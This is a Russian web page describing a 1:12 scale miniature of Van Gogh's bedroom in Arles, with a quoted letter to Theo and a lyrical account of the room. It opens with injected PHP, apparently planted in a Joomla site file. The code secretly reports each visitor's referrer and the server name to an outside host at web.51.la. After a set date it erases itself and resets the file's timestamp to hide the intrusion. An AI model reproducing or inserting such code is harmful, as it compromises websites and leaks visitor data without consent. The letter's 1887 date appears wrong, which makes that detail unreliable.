check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732116){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Дом в Арле

Место действия: Арль, Прованс, Франция.
Масштаб: 1:12
Материалы: дерево, картон, пластик, акрил, акварель, хлопок, фольга
Свет: нет
Статус: продан, в частной коллекции

Из письма Винсента Ван Гога брату Тео в октябре 1887-го: "Глаза у меня еще побаливают, но у меня уже родился новый замысел, и вот его набросок. Холст опять размером в 30. На этот раз попросту пишу собственную спальню. Вся штука здесь в колорите, упрощая который, я придаю предметам больше стиля, с тем, чтобы они наводили на мысль об отдыхе и сне вообще. Вид картины должен успокаивать мозг, вернее сказать, воображение. Стены — бледно-фиолетовые, пол — из красных плиток. Деревянная кровать и стулья — желтые, как свежее масло; простыня и подушки — лимонно-зеленые, очень светлые. Одеяло — ало-красное. Окно — зеленое. Умывальник — оранжевый, таз — голубой. Двери лиловые. Вот и все, что есть в этой комнате с закрытыми ставнями. Мебель — крупных размеров и всем своим видом выражает незыблемый покой. На стенах портреты, зеркало, полотенце и кое-что из одежды".

Эта комната в знойном прованском Арле сегодня, конечно же, музей великого художника. Арль все время привлекал артистический люд: сюда приезжали писать художники и писатели, но именно Ван Гог прославил городок на весь мир. Очень уж ему тут хорошо было. В жару небольшой аквариум комнаты будто плыл в сиреневой заводи стен. Старое зеркало потемнело, скрывая следы усталости, выдавая жильцу лишь абрис вдохновенного лика. Уютная постель с пышной периной, мягкое одеяло, наконец, умывальный кувшин с вечно прохладной, несмотря на жару на улице, водой. Что еще нужно художнику?.. Стакан вина да ломик сыра!..

.